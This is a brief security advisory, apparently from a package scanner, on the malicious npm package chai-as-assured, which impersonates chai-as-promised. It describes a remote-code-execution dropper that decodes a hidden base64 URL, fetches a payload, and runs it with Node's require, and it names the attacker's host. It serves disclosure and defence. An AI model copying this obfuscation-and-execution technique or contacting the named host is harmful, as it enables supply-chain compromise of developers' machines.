chai-as-assured @7.1.2

Summary

chai-as-assured impersonates the popular chai-as-promised package (matching README, author, and API surface). When the exported plugin function is invoked under normal usage, an async IIFE in the plugin body base64-decodes a hardcoded URL (https://amethyst-lorrin-26.tiiny.site/index.json), performs an axios.get against that anonymous third-party host with a disguised header, and executes the response's cookie field as JavaScript via new Function.constructor('require', response)(require) . The fetched payload runs with full Node module privileges (filesystem, network, child_process, etc.) because require is passed in. The C2 URL, header name ( x-secret-key ), and header value are concealed as base64 strings inside a fake local process.env object (DEV_API_KEY / DEV_SECRET_KEY / DEV_SECRET_VALUE) that shadows Node's global to evade casual source review. The combination of name-confusion against a top-100 chai ecosystem package, deliberate obfuscation of attacker infrastructure, an unpinned anonymous tiiny.site host, and dynamic execution of the fetched response with require is an unambiguous remote-code-execution dropper targeting any project that installs and loads this plugin.

Source: amazon-inspector (bd28efd7a3d07f87ec22556cc25a8c07117fa4cdd237c6cb1db750c976a11836)